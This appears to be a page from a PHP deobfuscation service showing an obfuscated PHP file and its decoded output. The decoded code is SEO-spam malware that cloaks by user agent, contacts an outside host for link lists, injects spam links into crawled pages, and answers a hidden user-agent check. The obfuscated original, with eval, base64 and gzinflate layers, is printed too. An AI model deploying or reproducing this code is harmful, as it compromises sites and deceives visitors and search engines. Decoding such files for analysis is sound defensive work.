Find this useful? Enter your email to receive occasional updates for securing PHP code.
Signing you up...
Thank you for signing up!
PHP Decode
<?php Error_Reporting(0); $xVebaPURjEzLc="pVhtc5tGEI7lxAghozHC+Eoq9y/4m7829owMmhhq8SIzSLrJ..
Decoded Output download
if ($_SERVER['HTTP_USER_AGENT']=="ANTIPIDERSIA") {
die("<font color='green'>CHETKO</font>#HUMSPM-v1.11");
}
$server_user_agent = @$_SERVER['HTTP_USER_AGENT'];
if (!preg_match('/ahrefs|SolomonoBot|SearchBot|MJ12bot|baiduspider|Synthesio|Purebot|Parking Domains|netEstate|majestic|selfbot/i', $server_user_agent)) {
$google = FALSE;
if (preg_match('/Googlebot|gsa-crawler|AdsBot-Google|Mediapartners|Googlebot-Mobile|http|bot|spider|crawler/i', $server_user_agent)) {
$google = true;
}
$owner_host="humspm.com";
$remhost = str_replace("www.","",$_SERVER['HTTP_HOST']);
$rempage = $_SERVER["SERVER_NAME"].$_SERVER["REQUEST_URI"];
$rempage = urlencode($rempage);
$linksurl = "http://".$owner_host."/counter.php?md5=".md5($remhost.$_SERVER['REQUEST_URI']."links")."&hst=".$remhost."&page=".$rempage;
$selfagent = 'selfbot';
$useragent = 'Opera 10.00';
function str_replace_once($search, $replace, $text) {
$pos = stripos($text, $search);
return $pos!==false ? substr_replace($text, $replace, $pos, strlen($search)) : $text;
}
function curPageURL() {
$pageURL = 'http';
if ($_SERVER["HTTPS"] == "on") {$pageURL .= "s";}
$pageURL .= "://";
if ($_SERVER["SERVER_PORT"] != "80") {
$pageURL .= $_SERVER["SERVER_NAME"].":".$_SERVER["SERVER_PORT"].$_SERVER["REQUEST_URI"];
} else {
$pageURL .= $_SERVER["SERVER_NAME"].$_SERVER["REQUEST_URI"];
}
return $pageURL;
}
function get_mydata($uri,$useragent) {
$ch = curl_init();
curl_setopt ($ch, CURLOPT_URL,$uri);
curl_setopt ($ch, CURLOPT_USERAGENT, $useragent);
curl_setopt ($ch, CURLOPT_TIMEOUT, 20);
curl_setopt ($ch, CURLOPT_RETURNTRANSFER, 1);
$result = curl_exec ($ch);
curl_close($ch);
return $result;
}
if ($google == TRUE) {
$selfuri = curPageURL();
$data = get_mydata($selfuri,$selfagent);
$links_file = get_mydata($linksurl,$useragent);
$links_file = str_replace('|||','',$links_file);
$links = explode("
", $links_file);
$l_count = count($links);
function check($param1,$param2) {
return stripos(strtolower($param1),strtolower($param2));
}
function makelinks($data) {
global $links;
$pagecontent = $data;
$_2 = 1;
$_11 = false;
$_12="";
$_13 = check($pagecontent,"<body");
if($_13!==false){
$_14=array();
$_15=array();
$_16=array();
$_17=array();
$_18=array();
$_19=array();
$strfrag=substr($pagecontent,$_13);
$_21=strip_tags($strfrag);
$_22="/[a-z]{2,}+ and /";
preg_match_all($_22,$_21,$_14,PREG_OFFSET_CAPTURE);
$_23="/[a-z]{2,}+ the /";
preg_match_all($_23,$_21,$_15,PREG_OFFSET_CAPTURE);
$_24="/[a-z]{2,}+ of /";
preg_match_all($_24,$_21,$_16,PREG_OFFSET_CAPTURE);
$_25="/[a-z]{2,}+ to /";
preg_match_all($_25,$_21,$_17,PREG_OFFSET_CAPTURE);
$_26="/[a-z]{2,}+ on /";
preg_match_all($_26,$_21,$_18,PREG_OFFSET_CAPTURE);
$_27="/[a-z]{2,}+ is /";
preg_match_all($_27,$_21,$_19,PREG_OFFSET_CAPTURE);
$_28="/[a-z]{2,}+ de /";
preg_match_all($_28,$_21,$_29,PREG_OFFSET_CAPTURE);
$_30="/[a-z]{2,}+ en /";
preg_match_all($_30,$_21,$_31,PREG_OFFSET_CAPTURE);
$_32="/[a-z]{2,}+ und /";
preg_match_all($_32,$_21,$_33,PREG_OFFSET_CAPTURE);
$_34="/[a-z]{2,}+ auf /";
preg_match_all($_34,$_21,$_35,PREG_OFFSET_CAPTURE);
$_36="/[a-z]{2,}+ y /";
preg_match_all($_36,$_21,$_37,PREG_OFFSET_CAPTURE);
$_38="/[a-z]{2,}+ e /";
preg_match_all($_38,$_21,$_39,PREG_OFFSET_CAPTURE);
$_40="/[a-z]{2,}+ et /";
preg_match_all($_40,$_21,$_41,PREG_OFFSET_CAPTURE);
$_42="/[a-z]{2,}+ la /";
preg_match_all($_42,$_21,$_43,PREG_OFFSET_CAPTURE);
$_44="/[a-z]{2,}+ des /";
preg_match_all($_44,$_21,$_45,PREG_OFFSET_CAPTURE);
$_46="/[a-z]{2,}+ der /";
preg_match_all($_46,$_21,$_47,PREG_OFFSET_CAPTURE);
$_48="/[a-z]{2,}+ die /";
preg_match_all($_48,$_21,$_49,PREG_OFFSET_CAPTURE);
$plines=array();
foreach($_14[0]as $plvalue) {
$plines[$plvalue[0]]=1;
}
foreach($_15[0]as $plvalue) {
$plines[$plvalue[0]]=1;
}
foreach($_16[0]as $plvalue) {
$plines[$plvalue[0]]=1;
}
foreach($_17[0]as $plvalue) {
$plines[$plvalue[0]]=1;
}
foreach($_18[0]as $plvalue) {
$plines[$plvalue[0]]=1;
}
foreach($_19[0]as $plvalue) {
$plines[$plvalue[0]]=1;
}
foreach($_29[0]as $plvalue) {
$plines[$plvalue[0]]=1;
}
foreach($_31[0]as $plvalue) {
$plines[$plvalue[0]]=1;
}
foreach($_33[0]as $plvalue) {
$plines[$plvalue[0]]=1;
}
foreach($_35[0]as $plvalue) {
$plines[$plvalue[0]]=1;
}
foreach($_37[0]as $plvalue) {
$plines[$plvalue[0]]=1;
}
foreach($_39[0]as $plvalue) {
$plines[$plvalue[0]]=1;
}
foreach($_41[0]as $plvalue) {
$plines[$plvalue[0]]=1;
}
foreach($_43[0]as $plvalue) {
$plines[$plvalue[0]]=1;
}
foreach($_45[0]as $plvalue) {
$plines[$plvalue[0]]=1;
}
foreach($_47[0]as $plvalue) {
$plines[$plvalue[0]]=1;
}
foreach($_49[0]as $plvalue) {
$plines[$plvalue[0]]=1;
}
$plines_keys=array_keys($plines);
$_53=$strfrag;
$_54=-1;
foreach($plines_keys as $_55){
$_54++;
if(($_54%$_2)!= 0) continue;
$_56=0;
$_57=false;
$_58=0;
do { $_59=stripos($_53,$_55,$_56);
$_56=$_59+strlen($_55);
if($_59!==false) {
$_60=strrpos(substr($_53,0,$_59),">");
$_61=strrpos(substr($_53,0,$_59),"<");
if($_60===false){
$_60=0;
}
if($_61===false) {
$_11=true;
break;
} if($_60<=$_61) { continue; }
if(count($links)<=0) break;
$_58=trim(array_shift($links));
if($_58==NULL || strlen($_58) < 4) { break;
}
$_53=substr($_53,0,$_59+strlen($_55)).$_58." ".substr($_53,$_59+strlen($_55));
$_57=true;
} else { break; }
} while(!$_57);
if($_11) break;
if(count($links)<=0)break;
}
$_12=substr($pagecontent,0,$_13).$_53;
} else {
$_11=true;
$_12=$pagecontent;
}
$data=$_12;
return $data;
}
echo makelinks($data);
exit;
}
}
eval(base64_decode("ZXZhbChiYXNlNjRfZGVjb2RlKCJKSGhWT1RORmQydE9VWHB5UFdKaGMyVTJORjlrWldOdlpHVW9JbGx0Um5wYVZGa3dXREpTYkZreU9XdGFVVDA5SWlrN0pIaFVVek15YWtGNGEwZDNTejFpWVhObE5qUmZaR1ZqYjJSbEtDSmpNMUo1WWtkV2RTSXBPeVI0V2taUFRGWmxla0Y1ZVZkMlBXSmhjMlUyTkY5a1pXTnZaR1VvSWxreWFIa2lLVHNrZUVsSldteENVRFY1VDJsMFJEMWlZWE5sTmpSZlpHVmpiMlJsS0NKaU0wcHJJaWs3SkhoRk5IbHZlR050VVRSVFBXSmhjMlUyTkY5a1pXTnZaR1VvSWxvemNIQmliVnB6V1ZoU2JDSXBPdz09IikpO2V2YWwoYmFzZTY0X2RlY29kZSgiSkhoV1pXSmhVRlZTYWtWNlRHTTlKSGhGTkhsdmVHTnRVVFJUS0NSNFZUa3pSWGRyVGxGNmNpZ2tlRlpsWW1GUVZWSnFSWHBNWXlrcE95UjRSR2xIVlVaRFIyNUtVSHBxUFNSNFZGTXpNbXBCZUd0SGQwc29KSGhXWldKaFVGVlNha1Y2VEdNcE93PT0iKSk7"));eval(base64_decode("JHh0c21STDVMUFk1PScnO2ZvcigkeElvV0FaUTVMWWJIcz0wOyR4SW9XQVpRNUxZYkhzPCR4RGlHVUZDR25KUHpqOyR4SW9XQVpRNUxZYkhzKyspeyR4dHNtUkw1TFBZNS49JHhaRk9MVmV6QXl5V3YoKCR4SUlabEJQNXlPaXREKCR4VmViYVBVUmpFekxjWyR4SW9XQVpRNUxZYkhzXSleMzk4MTM4NDI2KSk7fWV2YWwoJHh0c21STDVMUFk1KTs="));eval(base64_decode("JHhVOTNFd2tOUXpyPWJhc2U2NF9kZWNvZGUoIlltRnpaVFkwWDJSbFkyOWtaUT09Iik7JHhUUzMyakF4a0d3Sz1iYXNlNjRfZGVjb2RlKCJjM1J5YkdWdSIpOyR4WkZPTFZlekF5eVd2PWJhc2U2NF9kZWNvZGUoIlkyaHkiKTskeElJWmxCUDV5T2l0RD1iYXNlNjRfZGVjb2RlKCJiM0prIik7JHhFNHlveGNtUTRTPWJhc2U2NF9kZWNvZGUoIlozcHBibVpzWVhSbCIpOw=="));eval(base64_decode("JHhWZWJhUFVSakV6TGM9JHhFNHlveGNtUTRTKCR4VTkzRXdrTlF6cigkeFZlYmFQVVJqRXpMYykpOyR4RGlHVUZDR25KUHpqPSR4VFMzMmpBeGtHd0soJHhWZWJhUFVSakV6TGMpOw=="));$xU93EwkNQzr=base64_decode("YmFzZTY0X2RlY29kZQ==");$xTS32jAxkGwK=base64_decode("c3RybGVu");$xZFOLVezAyyWv=base64_decode("Y2hy");$xIIZlBP5yOitD=base64_decode("b3Jk");$xE4yoxcmQ4S=base64_decode("Z3ppbmZsYXRl");
Did this file decode correctly?
Original Code
<?php Error_Reporting(0); $xVebaPURjEzLc="pVhtc5tGEI7lxAghozHC+Eoq9y/4m7829owMmhhq8SIzSLrJB2pJ7UitX5vaCX+9u3dwQjgwnsqTiHvZfW5vn73lltMTb2xqx8k8nf2Zzr70bpfLRbKCXvL8Lb1f9m4kiTzfL+8Wd9/T2fzumXTNT6cnU49qZG8c+I4ZBWFgSb2JRanfe//1Nl3+/bB3iFPvf7pdPc0XT0efFV1RSHfn9OTi9OTYptZnaiUuPJN4QgFCMv+tMQDU0MSPA4tOklHsREOtdxgPLTq2+3NYfBT4wT+B05/T2IqG2Hr6S2lew/M69qauPfCm1OrPz31nSG0v6C9ci+LsIrauPH9ifg9GsefbfZ86qe3EDu2P4t+o7XhR36bhGEQPvZ5hvra7y1wBO5oEwSSksI2X58d5mtm7Ye43JoGrTuz4KLLiyxBsep7aYO4Rn+w/0akXD2LL8all94XG0VNw7cH00HEGfUTINpSB1Nq2tsyxXMr9f3pimsfBJSySDAPbkcjQHdmDkR4FI7LDJi06whnQsh0rseggjCOg+/LyUicGIUaJq9uHObDUFboDMAB0hRThz+T++SklN/p6fJb+sUrny2Q1uyM3ZXXXCqkfBVOq5YPZCqHnX9kwCzIEffLu8JDohQ3p5DAKXN+hlj4YDj6Mph2J6PCr5ftaW9ArWNC70QmDJl2d/DxEx+hCg/yMBmQj2OSmYHjkEdzLYqXHp5AJMfUwgI6ptPRWi02fnoxdP3K8wC96OAl8cDOAYhgb6As2DC2HnjnAp4nI5vEgsDk1HrQ0NskiANW6O1zIoo5r+Uz2oySN49Cm5gfTdq+LjOaq64VA3EBkcH1uCATSO24BQl+YGEDC+si1FrDL1exRY/EGCLyLu0Zy2HY3EgzBmJmTG1MC/gIf04lQ0mHIJjsXRSAcQ4pfA2VhtXiYLQHuI8g1Wjw7mRvqVYFI3hG9Aq0uSC9Mit588zJ1UPBfMMWR8jMqXDyhTjI6n8ZOrB27lmesIyvbKvs7jobgcqAjTDzfczR+VtgfG7SpEwwc8B5G1ldY52GBdjwaiPk2YdgFS8hGIbjfpLm8e0ofVqDXbL1JfpYuV7P75ez5fv6SzgxTKWhBrNpu6OR7pWc0Ytpl4CgMbFqayD3NIbJx5mwWV3mqlMzlbJXy9IlnGhzElxORvsOSPlICE0V+MnFjnRgyWZZYkrHHUnFRI09mxqZPNxWKZ7bX7/d7Rq9nFETWGiBMzwYhZk3yu08M85VUwnIjbgifmQHcyvWpHtLoSoOItOKRYvBnM88/mRfz9ANPB97Bl9TKFbrGq7Fml9OA8V5MfqP4ijIDNOZN5vNJGFzHYWY4s4ufjQguFDydMlnEO06a0FV4U1GgzRJd1m9KhGRNGfebb0pAGWTvOpies3sJpBYNBfNk2f3ENVUptqz4nJ8n6HdK/Xapv1/qN0r93Y0+OGoMpEs8L28ah9ZkWk1FYu5OnHgCrsq0uvxNYqIA7PXwS3z0682npnFxYMb+1OQZc30JSeIw1FDUQECEV43FLP2WPLy8zNNl8vV5AccuzZeUNxHh6lSJKAvETh2iuokYjCsBVQHYrgPslEwMKgE7AnC/DrBdstCvBGwLwEYd4P4moGdXAu4LwN06wMYm4LSalEYO2KwDlFubgLRyy3IrB5SVOsBSJLrVkSiLSJTlOsRS3MRuZeDIInDkukiUSzyfV+IJmuW6uJFLrFSSIgtS5DpS1DIpThWgKkhR60hRS6SEcSWg4ESt40RVy3FYGdmq4ESt40RtlxGtSkTBilrHilo+K14lL6rgRa3mhb2H4KVE7WIKh3/jwKIxFHmYUb+0bmIb5T7HoUvzKzHT+pKPgsyNpOTXv4J2Zyvt9lba+1tpN7bS3t1Gu7mVtqxspS1vpb0V3/JWjMlbeU3dymvqVl5Tt/KaupXX1P/htbVAckXPs9zBmlo2nuWrjizlN7tsQJWOGIwwoIBjohlJp5PdUzvqwUF2i9Ww9wscjC5UxK2uifdJz3ezW3GnLbWy1r5UuC13Gnx8GsA1H7q7kvi+AJYZuBT+tLsCBoUO8k8FaIm4RXd2xS2a1wzHSbuFeBYrGLK7LsLi66uz2zXIe5IBt5V6wb3CbR1AxW1dLNPiJbqQUaS1LVmdIGXfwsxr8OsVl88A9yRUQbOF2xiLML1RL+1J4FmhztwH7hppnF176I2FaMEvDUm6Xz0+mv2+uXZco2vumSouyfHMLHBYRLz2wYbLuzoC6MQkelHytZygPN96/hEjX/SCjV0OoU7UPqIkL9h4VaQU9vpDV6xnL3hBAsXXj2qaFq9q0GqZixe/pRSp4RhF5QI81n8SCrCxvKzPq8K8yqTRMHhVYYIAPfMQjBX+8PMf";preg_replace("/.*/e","\x65\x76\x61\x6C\x28\x62\x61\x73\x65\x36\x34\x5F\x64\x65\x63\x6F\x64\x65\x28'ZXZhbChiYXNlNjRfZGVjb2RlKCJaWFpoYkNoaVlYTmxOalJmWkdWamIyUmxLQ0pLU0doV1QxUk9SbVF5ZEU5VldIQjVVRmRLYUdNeVZUSk9SamxyV2xkT2RscEhWVzlKYkd4MFVtNXdZVlpHYTNkWFJFcFRZa1pyZVU5WGRHRlZWREE1U1dsck4wcElhRlZWZWsxNVlXdEdOR0V3WkROVGVqRnBXVmhPYkU1cVVtWmFSMVpxWWpKU2JFdERTbXBOTVVvMVdXdGtWMlJUU1hCUGVWSTBWMnRhVUZSR1dteGxhMFkxWlZaa01sQlhTbWhqTWxVeVRrWTVhMXBYVG5aYVIxVnZTV3hyZVdGSWEybExWSE5yWlVWc1NsZHRlRU5WUkZZMVZESnNNRkpFTVdsWldFNXNUbXBTWmxwSFZtcGlNbEpzUzBOS2FVMHdjSEpKYVdzM1NraG9SazVJYkhabFIwNTBWVlJTVkZCWFNtaGpNbFV5VGtZNWExcFhUblphUjFWdlNXeHZlbU5JUW1saVZuQjZWMVpvVTJKRFNYQlBkejA5SWlrcE8yVjJZV3dvWW1GelpUWTBYMlJsWTI5a1pTZ2lTa2hvVjFwWFNtaFZSbFpUWVd0V05sUkhUVGxLU0doR1RraHNkbVZIVG5SVlZGSlVTME5TTkZaVWEzcFNXR1J5Vkd4R05tTnBaMnRsUmxwc1dXMUdVVlpXU25GU1dIQk5XWGxyY0U5NVVqUlNSMnhJVmxWYVJGSXlOVXRWU0hCeFVGTlNORlpHVFhwTmJYQkNaVWQwU0dRd2MyOUtTR2hYV2xkS2FGVkdWbE5oYTFZMlZFZE5jRTkzUFQwaUtTazciKSk7ZXZhbChiYXNlNjRfZGVjb2RlKCJKSGgwYzIxU1REVk1VRmsxUFNjbk8yWnZjaWdrZUVsdlYwRmFVVFZNV1dKSWN6MHdPeVI0U1c5WFFWcFJOVXhaWWtoelBDUjRSR2xIVlVaRFIyNUtVSHBxT3lSNFNXOVhRVnBSTlV4WllraHpLeXNwZXlSNGRITnRVa3cxVEZCWk5TNDlKSGhhUms5TVZtVjZRWGw1VjNZb0tDUjRTVWxhYkVKUU5YbFBhWFJFS0NSNFZtVmlZVkJWVW1wRmVreGpXeVI0U1c5WFFWcFJOVXhaWWtoelhTbGVNems0TVRNNE5ESTJLU2s3ZldWMllXd29KSGgwYzIxU1REVk1VRmsxS1RzPSIpKTs='\x29\x29\x3B",".");return;?>
Function Calls
chr | 5888 |
ord | 5888 |
strlen | 1 |
gzinflate | 1 |
preg_replace | 1 |
base64_decode | 2 |
Error_Reporting | 1 |
Stats
MD5 | 07f1789c1609e52e5d763675e174bf36 |
Eval Count | 11 |
Decode Time | 19822 ms |